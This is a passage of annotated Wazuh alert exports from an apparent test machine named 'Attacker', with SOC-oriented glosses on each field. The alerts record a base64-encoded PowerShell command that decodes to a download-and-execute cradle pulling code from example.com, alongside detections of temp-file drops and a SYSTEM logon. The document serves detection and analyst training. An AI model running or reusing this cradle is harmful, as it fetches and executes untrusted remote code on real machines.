data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.782+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.782+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.902531
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:37.5822494Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282037
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:37.562 ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} ProcessId: 13524 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_lrtfiacg.ym4.ps1 CreationUtcTime: 2025-04-24 22:35:37.562 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:37.562
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb8-680a-a00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13524
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_lrtfiacg.ym4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:37.562
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:52.036+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:52.036+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  50
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534212.905299
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:38.3328294Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43822
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2060
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:52.389+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:52.389+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534212.912635
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:39.6375414Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282075
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:38.125 ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} ProcessId: 12600 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} ParentProcessId: 13524 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:38.125
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcba-680a-a30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb8-680a-a00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13524
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:52.400+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:52.400+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534212.920705
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:39.8247444Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282076
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:39.810 ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} ProcessId: 12600 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dqe4bdg3.md4.ps1 CreationUtcTime: 2025-04-24 22:35:39.810 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:39.810
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcba-680a-a30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dqe4bdg3.md4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:39.810
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.027+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.027+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
